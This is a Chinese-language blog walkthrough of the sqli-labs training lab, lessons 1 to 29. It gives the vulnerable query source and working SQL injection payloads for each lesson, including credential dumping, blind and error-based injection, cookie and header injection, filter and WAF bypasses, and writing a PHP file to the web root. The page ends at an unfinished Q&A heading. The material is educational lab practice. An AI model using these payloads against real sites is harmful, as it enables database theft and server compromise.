<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>sqli-labs 1-65通关教程 | sm0nk&#39;s blog</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="[TOC] 前记为体系化梳理注入的知识体系，刷了一遍sqli-labs，做完后参考其他人的教程和手册，查漏补缺。 sql注入的分类？？ 1.基于从服务器接收到的响应  ​    1.1基于错误的 SQL 注入  ​    1.2联合查询的类型  ​    1.3堆查询注射  ​    1.4SQL 盲注  ​        1.4.1基于布尔 SQL 盲注  ​        1.4.2基于时间的">
<meta name="keywords" content="sql injection">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs 1-65通关教程">
<meta property="og:url" content="http://yoursite.com/2019/03/24/sqli-labs-1-65通关教程/index.html">
<meta property="og:site_name" content="sm0nk&#39;s blog">
<meta property="og:description" content="[TOC] 前记为体系化梳理注入的知识体系，刷了一遍sqli-labs，做完后参考其他人的教程和手册，查漏补缺。 sql注入的分类？？ 1.基于从服务器接收到的响应  ​    1.1基于错误的 SQL 注入  ​    1.2联合查询的类型  ​    1.3堆查询注射  ​    1.4SQL 盲注  ​        1.4.1基于布尔 SQL 盲注  ​        1.4.2基于时间的">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-03-24T13:18:11.477Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sqli-labs 1-65通关教程">
<meta name="twitter:description" content="[TOC] 前记为体系化梳理注入的知识体系，刷了一遍sqli-labs，做完后参考其他人的教程和手册，查漏补缺。 sql注入的分类？？ 1.基于从服务器接收到的响应  ​    1.1基于错误的 SQL 注入  ​    1.2联合查询的类型  ​    1.3堆查询注射  ​    1.4SQL 盲注  ​        1.4.1基于布尔 SQL 盲注  ​        1.4.2基于时间的">
  
    <link rel="alternative" href="/atom.xml" title="sm0nk&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="http://p6.sinaimg.cn/3607464725/180/71341468803657">
  
  <link rel="stylesheet" href="/css/style.css">
  
  

  <script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>
  <script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>

  
</head></html>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="/img/kongfu.gif" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/">sm0nk</a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/categories/攻防渗透/">攻防渗透</a></li>
				        
							<li><a href="/categories/编程之道/">编程之道</a></li>
				        
							<li><a href="/categories/归纳总结/">归纳总结</a></li>
				        
							<li><a href="/categories/认知独省/">认知独省</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
								<a class="mail" target="_blank" href="mailto:sm0nk@qq.com" title="mail">mail</a>
					        
								<a class="weibo" target="_blank" href="http://weibo.com/shellr00t" title="weibo">weibo</a>
					        
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/SQL注入/" style="font-size: 10px;">SQL注入</a> <a href="/tags/blog/" style="font-size: 10px;">blog</a> <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/pentest/" style="font-size: 10px;">pentest</a> <a href="/tags/python/" style="font-size: 20px;">python</a> <a href="/tags/seleinum/" style="font-size: 10px;">seleinum</a> <a href="/tags/sql-injection/" style="font-size: 10px;">sql injection</a> <a href="/tags/struts2/" style="font-size: 10px;">struts2</a> <a href="/tags/业务逻辑/" style="font-size: 10px;">业务逻辑</a> <a href="/tags/代理转发/" style="font-size: 10px;">代理转发</a> <a href="/tags/工控安全/" style="font-size: 10px;">工控安全</a> <a href="/tags/应急/" style="font-size: 20px;">应急</a> <a href="/tags/接口安全/" style="font-size: 10px;">接口安全</a> <a href="/tags/渗透/" style="font-size: 10px;">渗透</a> <a href="/tags/爆破/" style="font-size: 10px;">爆破</a>
					</div>
				</section>
				
				
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide">sm0nk</h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="/img/kongfu.gif" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author">sm0nk</h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/categories/攻防渗透/">攻防渗透</a></li>
		        
					<li><a href="/categories/编程之道/">编程之道</a></li>
		        
					<li><a href="/categories/归纳总结/">归纳总结</a></li>
		        
					<li><a href="/categories/认知独省/">认知独省</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
						<a class="mail" target="_blank" href="mailto:sm0nk@qq.com" title="mail">mail</a>
			        
						<a class="weibo" target="_blank" href="http://weibo.com/shellr00t" title="weibo">weibo</a>
			        
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-sqli-labs-1-65通关教程" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/03/24/sqli-labs-1-65通关教程/" class="article-date">
  	<time datetime="2019-03-24T12:39:11.000Z" itemprop="datePublished">2019-03-24</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      sqli-labs 1-65通关教程
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/sql-injection/">sql injection</a></li></ul>
	</div>

        
	<div class="article-category tagcloud">
	<a class="article-category-link" href="/categories/攻防渗透/">攻防渗透</a>
	</div>


        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>[TOC]</p>
<h1 id="前记"><a href="#前记" class="headerlink" title="前记"></a>前记</h1><p>为体系化梳理注入的知识体系，刷了一遍sqli-labs，做完后参考其他人的教程和手册，查漏补缺。</p>
<p>sql注入的分类？？</p>
<p><strong>1.基于从服务器接收到的响应</strong> </p>
<p>​    1.1基于错误的 SQL 注入 </p>
<p>​    1.2联合查询的类型 </p>
<p>​    1.3堆查询注射 </p>
<p>​    1.4SQL 盲注 </p>
<p>​        1.4.1基于布尔 SQL 盲注 </p>
<p>​        1.4.2基于时间的 SQL 盲注 </p>
<p>​        1.4.3基于报错的 SQL 盲注 </p>
<p><strong>2.基于如何处理输入的 SQL 查询(数据类型)</strong> </p>
<p>​    2.1基于字符串 </p>
<p>​    2.2数字或整数为基础的 </p>
<p><strong>3.基于程度和顺序的注入(哪里发生了影响)</strong> </p>
<p>​    3.1 一阶注射 </p>
<p>​    3.2 二阶注射 </p>
<p><strong>4.基于注入点的位置上的</strong> </p>
<p>​    4.1通过用户输入的表单输入点 </p>
<p>​    4.2通过搜索框注入</p>
<p>​    4.3页面任意变量传递点</p>
<p>​    4.4通过headers变量注入 (Cookie UA referer x-forward-for etc.) </p>
<p><strong>5.基于数据包形式结构</strong> </p>
<p>​    5.1GET</p>
<p>​    5.2POST</p>
<p>​    5.3AUTH(登录认证型)</p>
<p><strong>6.基于sql语句结构</strong> </p>
<p>​    where </p>
<p>​    order by </p>
<p><strong>7.另类注入</strong> </p>
<p>​    7.1宽字节注入</p>
<p>​    7.2编码变形</p>
<p>#Page-1 (Basic Injections)</p>
<p>##第1关 </p>
<p>报错注入 </p>
<p>源码：$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”; </p>
<p>时间盲注：<a href="http://127.0.0.1/sqli-labs/Less-1/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=1&#39;</a> and sleep(5) and ‘abc’=’abc </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-1/?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=1&#39;</a> order by 3 — a </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-1/?id=-9670&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=-9670&#39;</a> UNION SELECT NULL,database(),NULL — - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;</a> union select 1,2,group_concat(schema_name) from information_schema.schemata – - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;</a> union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’security’;– - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;</a> union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’;– - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;</a> union select 1,group_concat(username,0x5e,password),3 from users;– - </p>
<p><strong>写shell</strong></p>
<p><a href="http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-1/?id=-1&#39;</a> union select 1,2,0x3c3f70687020706870696e666f28293b203f3e into outfile ‘//Applications/XAMPP/htdocs/onlytest/shell.php’ – - </p>
<p>##第2关 </p>
<p>报错注入 </p>
<p>数字类型注入，不用闭合双引号 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-2?id=-1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-2?id=-1</a> UNION select null,database(),null– - </p>
<p>##第3关 </p>
<p>报错注入 单引号括号注入 </p>
<p>源码：$sql=”SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-3?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-3?id=1&#39;</a>) order by 4 — </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-3?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-3?id=-1&#39;</a>) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’ – - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-3?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-3?id=1&#39;</a>) union select if(ascii(mid(database(),1,1))=115,1,(select 1 union select 2)),null,null – - </p>
<p>##第4关 </p>
<p>报错注入 双引号+括号 </p>
<p>源码：$id = ‘“‘ . $id . ‘“‘; </p>
<p>$sql=”SELECT * FROM users WHERE id=($id) LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-4?id=1&quot;)order" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-4?id=1&quot;)order</a> by 4 – # </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-4?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-4?id=1&quot;</a>) and sleep(5) — - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-4?id=-1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-4?id=-1&quot;</a>) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’ – # </p>
<p>##第5关 </p>
<p>没有明确回显，盲注，单引号闭合；基于时间的盲注&amp;基于布尔的盲注 </p>
<p>源码：$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-5?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-5?id=-1&#39;</a> and sleep(5) – -  </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-5?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-5?id=-1&#39;</a> union select if(ascii(mid(database(),1,1))=115,1,(select 1 union select 2)),null,null — - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-5?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-5?id=1&#39;</a> and if(length(database())=8,sleep(5),1) — - </p>
<p>判断当前库为security,通过多行查询 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-5?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-5?id=-1&#39;</a> and if(left(database(),8)=0x7365637572697479,(select 1 union select 2),1) — - </p>
<p>判断有哪些表 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-5?id=?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-5?id=?id=1&#39;</a> and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)=’users’ ,(select 1 union select 2),1)–+ </p>
<p>##第6关 </p>
<p>双引号盲注 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-6?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-6?id=1&quot;</a> and sleep(5) — - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-6?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-6?id=1&quot;</a> and if(length(database())=8,sleeP(5),1)– - </p>
<p>##第7关 </p>
<p>双括号单引号盲注，写shell，前提是当前账号有写入权限且知道路径 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-7?id=1&#39;)" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-7?id=1&#39;)</a>) and sleeP(5) – - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-7?id=1&#39;)" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-7?id=1&#39;)</a>) and if(length(database())=8,sleeP(5),1)– - </p>
<p>##第8关 </p>
<p>布尔型单引号GET盲注 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-8?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-8?id=1&#39;</a> and left(database(),8)=’security’– - </p>
<p>##第9关 </p>
<p>单引号基于时间盲注 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-9?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-9?id=1&#39;</a> and if(length(database())=8,sleeP(5),1)– - </p>
<p>##第10关 </p>
<p>双引号基于时间盲注 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-10?id=1&quot;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-10?id=1&quot;</a> and if(left(database(),8)=’security’,sleep(5),1)– - </p>
<p>##第11关 </p>
<p>POST型，基于报错单引号 报错注入 </p>
<p>uname=admin’ or ‘’=’&amp;passwd=admin&amp;submit=Submit </p>
<p>uname=admin’ and extractvalue(1,concat(0x7e,(select user()))) – -&amp;passwd=admin&amp;submit=Submit </p>
<p><em>uname=admin’ and length(user())=14 – -&amp;passwd=admin&amp;submit=Submit</em></p>
<p>##第12关 </p>
<p>POST型，双引号+括号 报错注入 </p>
<p>uname=admin”) and length(database())=8 – -&amp;passwd=admin&amp;submit=Submit </p>
<p>uname=admin”) and extractvalue(1,concat(0x7e,(select database()))) – -&amp;passwd=admin&amp;submit=Submit </p>
<p><em>uname=admin”) and if((select table_name from information_schema.tables where table_schema = ‘security’ limit 3,1)=’users’,(select 1 union select 2),1) – -&amp;passwd=admin&amp;submit=Submit</em></p>
<p>##第13关 </p>
<p>POST 单引号+括号，报错注入 </p>
<p>uname=admin’) and extractvalue(1,concat(0x7e,(select user()))) – -&amp;passwd=admin&amp;submit=Submit </p>
<p>uname=admin’) and updatexml(1, concat(0x7e, version()), 1) – -&amp;passwd=admin&amp;submit=Submit </p>
<p>##第14关 </p>
<p>POST 双引号，报错注入 </p>
<p>uname=admin” and updatexml(1, concat(0x7e, version()), 1) – -&amp;passwd=admin&amp;submit=Submit </p>
<p>##第15关 </p>
<p>盲注 </p>
<p>uname=admin’and database()=’security’– -&amp;passwd=admin&amp;submit=Submit </p>
<p>##第16关 </p>
<p>双引号+括号，盲注 </p>
<p>uname=admin”)and database()=’security’– -&amp;passwd=admin&amp;submit=Submit </p>
<p>##第17关 </p>
<p>Update 注入 </p>
<p>增加了过滤函数check_input </p>
<p>stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。 </p>
<p>is_numeric：检测是否为数字字符串，可为负数和小数 </p>
<p>ctype_digit：检测字符串中的字符是否都是数字，负数和小数会检测不通过 </p>
<p>mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。 </p>
<p>Php程序对username进行了check_input 过滤，但是没有对password进行过滤 </p>
<p>uname=admin&amp;passwd=test1324’and updatexml(1,concat(0x7e,user()),1) – +&amp;submit=Submit </p>
<p>uname=admin&amp;passwd=test1324’and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=’security’limit 3,1)),1) – +&amp;submit=Submit </p>
<p>##第18关 </p>
<p>referer注入，uname &amp; password 均有check_input 过滤，但header 没有过滤。需要构造values的字段。 </p>
<p>源码：$insert=”INSERT INTO <code>security</code>.<code>uagents</code> (<code>uagent</code>, <code>ip_address</code>, <code>username</code>) VALUES (‘$uagent’, ‘$IP’, $uname)”; </p>
<p>​            mysql_query($insert); </p>
<p>​            print_r(mysql_error());   </p>
<p>//此payload 相当于构造三个字段去拼凑sql语句，然后注释后面，进行报错注入</p>
<p>User-Agent: firefox’and updatexml(1,concat(0x7e,database()),1),1,1) – + </p>
<p>##第19关 </p>
<p>同样的道理，类似18关，注入点在referer，此payload 相当于构造一个字段 </p>
<p>Referer: x’ and updatexml(1,concat(0x7e,user()),1) and ‘ </p>
<p>OR (SELECT 8370 FROM(SELECT COUNT(<em>),CONCAT(0x716a767671,(SELECT (ELT(8370=8370,1))),0x71706a7871,FLOOR(RAND(0)</em>2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ‘Jgwd’=’Jgwd </p>
<p>##第20关 </p>
<p>第147行，$sql=”SELECT * FROM users WHERE username=’$cookee’ LIMIT 0,1”; </p>
<p>Cookie: uname=admin’and updatexml(1,concat(0x7e,user()),1) – + </p>
<p>##第21关 </p>
<p>单引号+括号，有报错函数 </p>
<p>源码：$sql=”SELECT * FROM users WHERE username=(‘$cookee’) LIMIT 0,1”; </p>
<p><strong>payload</strong></p>
<p>Cookie: uname=YScpIHVuaW9uIHNlbGVjdCAxLDIsdXNlcigpIw== </p>
<p>(Decode:a’) union select 1,2,user()#) </p>
<p>##第22关 </p>
<p>双引号+base64 </p>
<p>存在mysql报错函数 </p>
<p>源代码：</p>
<p><em>$cookee = base64_decode($cookee);</em></p>
<p><em>$cookee1 = ‘“‘. $cookee. ‘“‘;</em></p>
<p><em>echo ““;</em></p>
<p><em>$sql=”SELECT \</em> FROM users WHERE username=$cookee1 LIMIT 0,1”;*</p>
<p><strong>Payload:</strong></p>
<p>Cookie: uname=YSIgdW5pb24gc2VsZWN0IDEsMix1c2VyKCkj </p>
<p>（decode: a” union select 1,2,user()#） </p>
<p>#Page-2 (Adv Injections)</p>
<p>##第23关 </p>
<p>单撇报错注入 </p>
<p>过滤了注释符— # </p>
<p><strong>源代码:</strong></p>
<p><em>$reg = “/#/“;</em></p>
<p><em>$reg1 = “/–/“;</em></p>
<p><em>$replace = “”;</em></p>
<p><em>$id = preg_replace($reg, $replace, $id);</em></p>
<p><em>$id = preg_replace($reg1, $replace, $id);</em></p>
<p>$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”; </p>
<p><strong>payload</strong></p>
<p><a href="http://127.0.0.1/sqli-labs/Less-23/?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-23/?id=-1&#39;</a>  union select 1,user(),3’ </p>
<p>不使用注释符，但可以拼接闭合sql语句</p>
<p>Sql语句为单引号闭合，所以payload可以先用一个单引号闭合前面的单引号，然后再最后放置一个单引号和语句中的后面的单引号闭合</p>
<p>Payload 为什么前面的数字使用-1 是因为 sql语句后面有limit ，如果前面的条件为真，则回显前面的结果。</p>
<p>SELECT * FROM users WHERE id=’-2’ union select 1,version(),3’’ LIMIT 0,1 </p>
<p>##第24关 </p>
<p>二阶sql注入，通过注册时将特殊字符代入 </p>
<p>注册时候注册admin’# 账号，这样在修改密码的时候通过单撇去闭合前面的sql语句，然后用#去注释后面的sql代码 </p>
<p>UPDATE users SET PASSWORD=’123456’ where username=’admin’#’ and password=’test1324’ <font size="3" color="#FFFF00"><center>Password successfully updated</center>   </font></p>
<p>mysql_escape_string 函数，转义单撇双引号类特殊字符，但存储的数据库的时候是输入的原字符。不会把转义字符也存入到数据内； </p>
<p>payload解释 </p>
<p>通过login_create.php页面创建账号， </p>
<p>Sql语句内使用双引号可以使用转义 </p>
<p>##第25关 </p>
<p>过滤了and 和 or </p>
<p>源代码 </p>
<p>$id= preg_replace(‘/or/i’,””, ​$id);         //strip out OR (non case sensitive) </p>
<p>$id= preg_replace(‘/AND/i’,””, $id);        //Strip out AND (non case  </p>
<p>sensitive) </p>
<p>$sql=”SELECT * FROM users WHERE id=’​$id’ LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-25?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-25?id=-1&#39;</a> union select 1,user(),3 — + </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-25?id=-1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-25?id=-1&#39;</a> oorr sleeP(5) – + </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-25?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-25?id=1&#39;</a> anandd left(database(),8)=’security’— - </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-25?id=1&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-25?id=1&#39;</a> %26%26 left(database(),8)=’security’– - </p>
<p>过滤了and or 类可以使用</p>
<p>anandd</p>
<p>%26%26</p>
<p><strong>有一个疑问</strong>，为什么使用普通的url编码可以（例如%26%26，但是&amp;&amp; 竟然不可以）</p>
<p>一般绕过and or 类，可以考虑绕&amp;&amp;，||，%26%26，大小写，双写关键字(anandd,andand)，编码 </p>
<p><strong>在burp里面，将get 数据包更改post ,可以不用进行url编码，方便注入操作。</strong></p>
<p>##第25a关 </p>
<p>数字型注入，过滤了and or  </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-25a?id=1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-25a?id=1</a> anandd sleep(5) – - </p>
<p>##第26关 </p>
<p>与25关一样，sql语句没有单撇，过滤了and 和 or 但没有递归过滤 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-25a?id=1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-25a?id=1</a> anandd sleep(5) — - </p>
<p>当然不使用and也没有问题 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-25a?id=-1" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-25a?id=-1</a> union select 1,user(),3 – - </p>
<p>##第26a关 </p>
<p>过滤了or and /* — # 空格 / </p>
<p>Ps:%a0 空格的意思，类unix操作系统可以绕过，但windows 并不解析这个字符 </p>
<p>源代码 </p>
<p>​    $id= preg_replace(‘/or/i’,””, $id);         //strip out OR (non case sensitive) </p>
<p>​    $id= preg_replace(‘/and/i’,””, $id);        //Strip out AND (non case sensitive) </p>
<p>​    $id= preg_replace(‘/[\/*]/‘,””, $id);      //strip out /* </p>
<p>​    $id= preg_replace(‘/[–]/‘,””, $id);        //Strip out – </p>
<p>​    $id= preg_replace(‘/[#]/‘,””, ​$id);         //Strip out # </p>
<p>​    $id= preg_replace(‘/[\s]/‘,””, $id);        //Strip out spaces </p>
<p>​    $id= preg_replace(‘/[\/\\]/‘,””, $id);        //Strip out slashes </p>
<p>Payload:  使用%a0 进行绕过</p>
<p><a href="http://127.0.0.1/sqli-labs/Less-26?id=&#39;%a0unioN%a0select(1),(user()),(3)&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-26?id=&#39;%a0unioN%a0select(1),(user()),(3)&#39;</a> </p>
<p>##第27关 </p>
<p>基于原来的黑名单，又增加了过滤union select, 但程序的黑名单都是基于关键字的并没有递归，所以通过混淆大小写可以绕过。 </p>
<p>另外需要提示，由于存在limit 0,1 所以前面的必须不成长的条件，否则显示前条件的结果，<strong>不知道为什么id=-1 不可以报错</strong>，可能是因为过滤了-导致-1即为1？因为1和-1的结果是一样的。。。 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-27?id=&#39;%a0uNiOn%a0seLeCt%a0(1),(database()),(3)&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-27?id=&#39;%a0uNiOn%a0seLeCt%a0(1),(database()),(3)&#39;</a> </p>
<p>##第27a关 </p>
<p>双引号闭合，使用%a0代替空格 </p>
<p>127.0.0.1/sqli-labs/Less-27a?id=1”and%a0left(database(),8)=’security’” </p>
<p>##第28关 </p>
<p>单引号加括号，过滤了直接的union select ,可以使用union%a0select 来绕过 </p>
<p>由于存在括号和单引号，所以需要同时闭合，同时也要构造后面的(‘ ‘), 仍然需要使用and去构造后面的闭合。 </p>
<p>源代码：$sql=”SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1”; </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-28?id=&#39;)union%a0select%a0(1),(database()),(3)%a0and%a0(&#39;1&#39;)=" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-28?id=&#39;)union%a0select%a0(1),(database()),(3)%a0and%a0(&#39;1&#39;)=</a>(‘1 </p>
<p>亦可 </p>
<p>‘)union%a0select%a0(1),(database()),(3)%a0and%a0(‘’)=(‘ </p>
<p>##第28a关 </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-28a?id=1&#39;)%a0and%a0ascii(substr(database(),1,1))=115" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-28a?id=1&#39;)%a0and%a0ascii(substr(database(),1,1))=115</a> %a0and%a0(‘’)=(‘ </p>
<p>##第29关 </p>
<p>index.php: <a href="http://127.0.0.1/sqli-labs/Less-29?id=-11111&#39;" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-29?id=-11111&#39;</a> union select 1,user(),3’ </p>
<p><a href="http://127.0.0.1/sqli-labs/Less-29/login.php" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-29/login.php</a> <strong>没做出来</strong> </p>
<p>函数 </p>
<p>explode() 函数把字符串打散为数组。 </p>
<p><strong>29-31 的login.php 均为绕过waf, ,index.php 跟普通注入一样，存在waf的页面时login.php</strong> </p>
<p><strong>index.php类页面不再分析，主要分析login.php，因为login.php 才使用waf</strong></p>
<p>##第29关 </p>
<p>login.php </p>
<p>单引号+HPP </p>
<p>Waf 只能数字，经过两个过滤函数，java_implimentation() whitelist() </p>
<p>​    $qs = $_SERVER[‘QUERY_STRING’]; </p>
<p>​    $hint=$qs; </p>
<p>​    $id1=java_implimentation($qs); </p>
<p>​    $id=$_GET[‘id’]; </p>
<p>​    // echo $id; </p>
<p>​    whitelist($id1); </p>
<p><strong>Payload:双参数</strong></p>
<p><a href="http://127.0.0.1/sqli-labs/Less-29/login.php?id=1&amp;id=-2&#39;union" target="_blank" rel="noopener">http://127.0.0.1/sqli-labs/Less-29/login.php?id=1&amp;id=-2&#39;union</a> select 1,user(),3– - </p>
<p>关于HPP，参数污染，各编程语言的特性 </p>
<table>
<thead>
<tr>
<th>Web服务器</th>
<th>参数获取函数</th>
<th>获取到的参数</th>
</tr>
</thead>
<tbody>
<tr>
<td>PHP/Apache</td>
<td>$_GET(“par”)</td>
<td>Last</td>
</tr>
<tr>
<td>JSP/Tomcat</td>
<td>Request.getParameter(“par”)</td>
<td>First</td>
</tr>
<tr>
<td>Perl(CGI)/Apache</td>
<td>Param(“par”)</td>
<td>First</td>
</tr>
<tr>
<td>Python/Apache</td>
<td>Getvalue(“par”)</td>
<td>All(List)</td>
</tr>
<tr>
<td>ASP/IIS</td>
<td>Request.QueryString(“par”)</td>
<td>All(comma-delimited string)</td>
</tr>
</tbody>
</table>
<p>有两个问题需要跟踪： </p>
<p>第一个，代码当中是id1 进了过滤函数，而$id 没有进入白名单不知道为什么waf生效。。。 whitelist($id1); </p>
<p>第二个，代码中的函数存在的意义，为什么取值到第一个id的时候就停止了java_implimentation（） </p>
<p>第三个，实际的利用场景如何？ </p>
<p>答疑： </p>
